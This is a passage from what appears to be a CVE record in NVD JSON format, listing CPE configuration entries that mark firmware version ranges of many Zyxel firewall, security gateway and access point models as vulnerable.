                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_1900:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_20w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_20w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_20w-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_20w-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_2200-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_2200-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_310_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_310:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_40_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_40:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_40w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_40w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_60_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_60:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_60w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_60w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg20_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg20:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg210_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg210:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg2200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg2200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg310_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg310:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "1.33",
                        "versionStartIncluding": "1.00",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg300_firmware:1.33:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg300_firmware:1.33:patch2:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg300_firmware:1.33:patch3:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg300_firmware:1.33:patch4:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg300_firmware:1.33:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nsg300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "1.33",
                        "versionStartIncluding": "1.00",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg100_firmware:1.33:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg100_firmware:1.33:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg100_firmware:1.33:patch2:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg100_firmware:1.33:patch3:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg100_firmware:1.33:patch4:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nsg100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "1.33",
                        "versionStartIncluding": "1.00",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg50_firmware:1.33:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg50_firmware:1.33:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg50_firmware:1.33:patch2:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg50_firmware:1.33:patch3:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg50_firmware:1.33:patch4:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nsg50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nxc2500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.10\\(aaig.3\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nxc2500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nxc5500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.10\\(aaos.3\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nxc5500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nap203_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abfa.7\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nap203:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nap303_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abex.7\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nap303:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nap353_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abey.7\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nap353:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa50ax_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abyw.5\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa50ax:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa55axe_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abzl.5\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa55axe:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa90ax_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.27\\(accv.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa90ax:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa110ax_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.30\\(abtg.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa110ax:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa210ax_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.30\\(abtd.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa210ax:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa1123-ac-hd_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abin.6\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa1123-ac-hd:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa1123-ac-pro_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abhd.7\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa1123-ac-pro:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa1123acv3_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.30\\(abvt.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa1123acv3:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa1302-ac_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abku.6\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa1302-ac:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa5123-ac-hd_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abim.6\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa5123-ac-hd:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac500h_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.30\\(abwa.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac500h:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.30\\(abvs.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac5302d-s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.10\\(abfh.10\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac5302d-s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac5302d-sv2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abvz.6\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac5302d-sv2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac6103d-i_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(aaxh.7\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
